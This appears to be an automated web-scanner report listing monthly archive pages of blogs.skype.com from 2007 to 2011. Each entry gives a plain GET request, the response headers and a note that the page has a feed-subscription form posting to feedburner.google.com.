<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2007/08/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:17 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 617800 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2007/09/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:15 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 111695 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2007/10/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:14 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 134252 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2007/11/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:13 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 137689 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/01/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:12 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 125026 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/02/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:11 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 106907 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/03/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:10 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 126075 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/04/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:09 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 216000 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/05/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:07 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 87142 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/06/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:06 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 351318 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/07/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:05 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 138815 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/08/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:04 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 364699 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/09/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:02 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 132877 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/10/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:01 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 248998 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/11/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:00 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 135760 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2008/12/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:59 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 161922 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/01/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:57 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 105287 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/02/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:57 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 308499 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/03/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:55 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 527797 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/04/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:53 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 87373 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/05/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:52 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 111632 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/06/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:51 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 203279 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/07/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:50 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 125776 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/08/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:49 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 204408 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/09/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:47 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 163021 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/10/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:46 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 100515 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/11/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:45 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 183138 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2009/12/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:44 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 183916 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/01/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:43 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 182044 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/02/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:41 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 332415 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/03/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:39 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 292276 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/04/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:38 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 249793 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/05/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:36 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 363177 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/06/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:35 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 437288 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/07/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:33 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 585263 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/08/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:31 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 118021 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/09/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:30 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 242894 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/10/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:29 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 485845 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/11/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:27 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 545285 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2010/12/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:25 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 414773 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2011/01/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:53 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 485169 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2011/02/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:51 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 128365 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2011/03/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:50 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 236737 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2011/04/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:49 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 200715 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2011/05/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:47 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 202770 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2011/06/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:46 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 163214 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2011/07/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:45 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 109054 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2011/08/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:44 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 156054 Connection: close Content-Type: text/html; charset=UTF-8
